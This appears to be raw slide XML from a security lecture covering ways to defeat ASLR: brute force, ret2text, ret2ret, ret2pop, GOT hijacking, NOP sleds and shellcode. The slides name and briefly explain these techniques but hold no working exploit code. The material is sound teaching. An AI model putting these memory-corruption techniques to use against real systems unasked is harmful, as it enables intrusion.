            <p:cNvPr id="14" name="Oval 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="4424362"/>
              <a:ext cx="2120900"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err="1"/>
                <a:t>Func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
                <a:t>ptr</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Oval 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="3810000"/>
              <a:ext cx="2120900"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ret2ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4568825" y="4424363"/>
              <a:ext cx="2120900" cy="604837"/>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ret2pop</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6765925" y="2330450"/>
              <a:ext cx="1951038" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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GOT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>H</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>ijacking</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Oval 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6772275" y="3810000"/>
              <a:ext cx="1944688"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ret2got</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258601704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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Brute F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>orce</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2897188" y="3017838"/>
            <a:ext cx="134937" cy="407987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8E28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580" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="2971800"/>
            <a:ext cx="15121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dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Shell code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1419225" y="2574925"/>
            <a:ext cx="2760663" cy="2770188"/>
            <a:chOff x="241637" y="1296691"/>
            <a:chExt cx="2761937" cy="2768890"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval Callout 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="241637" y="1296691"/>
              <a:ext cx="1966232" cy="1274166"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 76089"/>
                <a:gd name="adj2" fmla="val -5751"/>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ectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2866986" y="1737809"/>
              <a:ext cx="136588" cy="257054"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="8E28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Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2866986" y="1994864"/>
              <a:ext cx="136588" cy="2070717"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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 name="Left Brace 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2630339" y="1994864"/>
              <a:ext cx="236647" cy="2070717"/>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24606" name="TextBox 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1185047" y="2759680"/>
              <a:ext cx="1395527" cy="461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dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>NOP Sled</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1268413" y="1250950"/>
            <a:ext cx="5021208" cy="5567947"/>
            <a:chOff x="854101" y="1251060"/>
            <a:chExt cx="5021488" cy="5567470"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="854101" y="2397137"/>
              <a:ext cx="3145012" cy="3371561"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 88302"/>
                <a:gd name="adj2" fmla="val -17769"/>
                <a:gd name="adj3" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="468966"/>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15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5194568" y="1251060"/>
              <a:ext cx="269890" cy="5243064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFF0A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 name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5251721" y="3382890"/>
              <a:ext cx="134945" cy="104766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="8E28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600" name="TextBox 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4767506" y="6418454"/>
              <a:ext cx="1108083" cy="400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a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5251721" y="3454321"/>
              <a:ext cx="134945" cy="368268"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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21504" name="Group 21503"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5942008" y="1828800"/>
            <a:ext cx="2363791" cy="4491038"/>
            <a:chOff x="5528666" y="1829515"/>
            <a:chExt cx="2363284" cy="4490818"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5528666" y="6167940"/>
              <a:ext cx="55550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5528666" y="5861567"/>
              <a:ext cx="55550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5528666" y="5564720"/>
              <a:ext cx="55550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a:off x="5528666" y="5239298"/>
              <a:ext cx="55550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5528666" y="4913877"/>
              <a:ext cx="55550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a:off x="5528666" y="4596392"/>
              <a:ext cx="55550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5528666" y="4310656"/>
              <a:ext cx="55550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5528666" y="4002696"/>
              <a:ext cx="55550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5528666" y="3705848"/>
              <a:ext cx="55550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a:off x="5528666" y="3380426"/>
              <a:ext cx="55550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5528666" y="3056592"/>
              <a:ext cx="55550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9" name="Up Arrow 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5587390" y="2299391"/>
              <a:ext cx="434881" cy="4020942"/>
            </a:xfrm>
            <a:prstGeom prst="upArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 109054"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B64926">
                <a:alpha val="33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596" name="TextBox 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5868347" y="1829515"/>
              <a:ext cx="2023603" cy="954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2800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B64926"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="B64926"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>rute </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B64926"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>force </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="B64926"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>search</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B64926"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29153512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5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a:xfrm>
            <a:off x="457200" y="266700"/>
            <a:ext cx="8229600" cy="879475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>How to attack with ASLR?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="487363" y="1474788"/>
            <a:ext cx="8229600" cy="3554412"/>
            <a:chOff x="487363" y="1474788"/>
            <a:chExt cx="8229600" cy="3554412"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="1474788"/>
              <a:ext cx="8229600" cy="709612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B64926"/>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600" b="1" dirty="0"/>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="2330450"/>
              <a:ext cx="1501775" cy="1328738"/>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Brute </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Force</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="2330450"/>
              <a:ext cx="2120900" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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Non-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>randomized </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="2330450"/>
              <a:ext cx="1951037" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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Stack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Juggling</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="3794125"/>
              <a:ext cx="2120900"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ret2text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Oval 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="4424362"/>
              <a:ext cx="2120900"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err="1"/>
                <a:t>Func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
                <a:t>ptr</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Oval 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="3810000"/>
              <a:ext cx="2120900"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ret2ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4568825" y="4424363"/>
              <a:ext cx="2120900" cy="604837"/>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ret2pop</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6765925" y="2330450"/>
              <a:ext cx="1951038" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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GOT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>H</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>ijacking</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Oval 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6772275" y="3810000"/>
              <a:ext cx="1944688"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ret2got</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346836608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smtClean="0"/>
              <a:t>ret2text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> section has executable program code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>but not typically randomized by ASLR except PIE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>can hijack control flow to unintended (but existing) program function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Figure 7 in reading</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4583412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dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28674" name="Content Placeholder 7" descr="ret2text.pdf"/>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a:xfrm>
            <a:off x="666810" y="1600200"/>
            <a:ext cx="4884738" cy="4532313"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28675" name="Picture 9" descr="Screen shot 2010-03-01 at 12.38.27 P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41938" y="1858963"/>
            <a:ext cx="3429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ounded Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5362575" y="1893888"/>
            <a:ext cx="1617663" cy="339725"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="30196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="37999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-239813" y="3949490"/>
            <a:ext cx="3101029" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031423" y="2135931"/>
            <a:ext cx="2548455" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
